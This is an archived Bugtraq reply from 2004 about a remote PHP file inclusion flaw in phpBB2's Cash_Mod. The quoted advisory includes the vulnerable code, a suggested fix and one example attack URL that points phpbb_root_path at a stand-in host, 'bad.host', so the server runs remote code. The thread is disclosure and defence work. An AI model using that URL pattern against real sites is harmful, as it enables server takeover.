Bugtraq mailing list archives
Re: Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.)
From: Rafael San Miguel Carrasco <smcsoc () yahoo es>
Date: Thu, 18 Nov 2004 18:11:58 +0100
Let me just point out that this vulnerability can only be exploited if two options in php.ini are enabled: - allow_url_fopen - register_globals The first one allows to access and retrieve http resources from fopen; the second lets a user specify GET or POST parameters that will be translated into PHP variables. For more information about PHP insertion and how it can be recognized and exploited: http://www.fistconference.org/data/presentaciones/exploitingwebapplications.tar Greetings. ------------------------------- Rafael San Miguel Carrasco Security Consultant Davinci Consulting ------------------------------- Jerome ATHIAS wrote:
Hi all phpBB is a very popular message board using modules extensions. One of these module – Cash_Mod is a very popular one and is used by many people. It has critical vulnerabilities, one of them letting anyone inject malicious PHP code that will be executed on the server side. Let’s start : In file /admin/admin_cash.php ….. if ( !empty($setmodules) ) { include($phpbb_root_path . 'includes/functions_cash.'.$phpEx); $menu = array(); admin_menu($menu); …. First, nothing seems wrong! It’s just a normal piece of code with “include” functions, but $phpbb_root_path & .$phpEx – are *NOT* define yet!I don’t know why, but someone decided to define these variables later in the code : …… // // Let's set the root dir for phpBB // $phpbb_root_path = "./../"; require($phpbb_root_path . 'extension.inc'); require('./pagestart.' . $phpEx); include($phpbb_root_path . 'includes/functions_selects.'.$phpEx); ….. Well, any user can rewrite these parameters with GET or POST requests. Example : http://victim.host/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://bad.host/Fix : Set all default parameters after “if ( !empty($setmodules) )” Example : // // Let's set the root dir for phpBB // $phpbb_root_path = "./../"; require($phpbb_root_path . 'extension.inc'); require('./pagestart.' . $phpEx); include($phpbb_root_path . 'includes/functions_selects.'.$phpEx); if ( !empty($setmodules) ) { include($phpbb_root_path . 'includes/functions_cash.'.$phpEx); $menu = array(); admin_menu($menu);Thank you rofl!
Current thread:
- Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.) Jerome ATHIAS (Nov 17)
- Re: Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.) Rafael San Miguel Carrasco (Nov 18)
- <Possible follow-ups>
- Re: Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.) Robert Hetzler (Nov 18)